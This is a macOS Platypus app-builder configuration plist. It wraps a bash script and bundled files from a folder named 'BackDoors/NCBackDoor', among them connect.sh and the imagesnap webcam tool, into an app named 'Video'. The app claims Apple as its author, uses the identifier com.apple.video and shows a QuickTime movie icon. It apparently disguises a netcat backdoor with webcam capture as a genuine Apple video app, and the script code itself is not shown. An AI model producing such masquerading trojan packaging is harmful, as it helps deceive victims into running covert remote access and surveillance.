<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>AcceptsFiles</key>
	<true/>
	<key>AcceptsText</key>
	<false/>
	<key>Authentication</key>
	<false/>
	<key>Author</key>
	<string>Apple</string>
	<key>BundledFiles</key>
	<array>
		<string>/Users/mosca1337/Documents/BackDoors/NCBackDoor/connect.sh</string>
		<string>/Users/mosca1337/Documents/BackDoors/NCBackDoor/ImageSnap-v0.2.5/imagesnap</string>
	</array>
	<key>Creator</key>
	<string>Platypus-4.7</string>
	<key>DeclareService</key>
	<false/>
	<key>Destination</key>
	<string>/Users/mosca1337/Desktop/MyPlatypusApp.app</string>
	<key>DestinationOverride</key>
	<false/>
	<key>DevelopmentVersion</key>
	<false/>
	<key>DocIcon</key>
	<string></string>
	<key>Droppable</key>
	<false/>
	<key>ExecutablePath</key>
	<string>/usr/local/share/platypus/ScriptExec</string>
	<key>FileTypes</key>
	<array>
		<string>****</string>
		<string>fold</string>
	</array>
	<key>IconPath</key>
	<string>/Users/mosca1337/Documents/BackDoors/NCBackDoor/QuickTime Movie.icns</string>
	<key>Identifier</key>
	<string>com.apple.video</string>
	<key>Interpreter</key>
	<string>/bin/bash</string>
	<key>InterpreterArgs</key>
	<array/>
	<key>Name</key>
	<string>Video</string>
	<key>NibPath</key>
	<string>/usr/local/share/platypus/MainMenu.nib</string>
	<key>OptimizeApplication</key>
	<true/>
	<key>Output</key>
	<string>None</string>
	<key>RemainRunning</key>
	<false/>
	<key>Role</key>
	<string>Viewer</string>
	<key>ScriptArgs</key>
	<array/>
	<key>ScriptPath</key>
	<string>/Users/mosca1337/Documents/BackDoors/NCBackDoor/setup.bash</string>
	<key>Secure</key>
	<false/>
	<key>ShowInDock</key>
	<true/>
	<key>StatusItemDisplayType</key>
	<string>Text</string>
	<key>StatusItemIcon</key>
	<data>
	</data>
	<key>StatusItemTitle</key>
	<string>MyPlatypusApp</string>
	<key>Suffixes</key>
	<array>
		<string>*</string>
	</array>
	<key>TextBackground</key>
	<string>#ffffff</string>
	<key>TextEncoding</key>
	<integer>4</integer>
	<key>TextFont</key>
	<string>Monaco</string>
	<key>TextForeground</key>
	<string>#000000</string>
	<key>TextSize</key>
	<real>10</real>
	<key>UseXMLPlistFormat</key>
	<true/>
	<key>Version</key>
	<string>1.0</string>
</dict>
</plist>
